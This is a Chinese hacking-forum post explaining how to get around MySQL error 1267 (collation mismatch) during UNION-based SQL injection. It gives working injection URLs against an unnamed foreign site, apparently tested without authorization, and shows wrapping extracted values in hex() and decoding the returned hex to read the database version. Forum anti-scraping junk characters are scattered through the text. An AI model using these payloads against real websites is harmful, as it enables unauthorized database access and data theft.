找回密码
 立即注册
查看: 2514|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei
0 B% {$ }7 q, Q6 G! t2 Z文章性质:原创
: v" W( L/ }. |" ~5 x3 }0 {发布日期:2005-10-18# k2 m  c- k4 ~/ I3 X/ s/ ~6 }9 E9 {
测试个国外的站时:
; Q, Z( s9 [& N7 S, }( x+ jurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*) o! c1 W6 Q8 V- {* X
返回错误:/ J& }4 S+ {4 o" [: z2 k' c
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'2 E" y5 D8 |- x( w' r' j, R5 u
MySQL Error No. 126
7 i) e( C5 M5 V" l看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。6 s/ h" T6 b9 p$ c5 H
解决办法:转为其他编码如hex。" W8 L/ F: x6 p  x1 d: K
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
3 r$ \  S1 @( p: Q( a  M成功得到hex(version())的值为:) m( j! B% [9 s& p8 e5 j7 [" D
342E312E332D62657461
6 g( B6 ~# C8 A* P8 C% x0 _2 d回Mysql查询下得到:3 O, A" ^/ E" k; K
mysql> select 0x342E312E332D62657461;
% U; x' y/ C1 A0 k/ ]+------------------------+: f) K8 ?' G3 G( }1 r; F" \% e
| 0x342E312E332D62657461 |
1 r3 [$ t; X; I9 f. F+------------------------+4 ?% n$ v: t! ~# {/ y& I( I# X
| 4.1.3-beta |+ i- U  V! x4 m2 p9 K: n: f
+------------------------+7 B( c- z, i! Y1 R! x
1 row in set (0.00 sec)
- f# E% T! k. \' y5 n/ f: m) O
5 A3 A: G5 M" ^" {2 @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表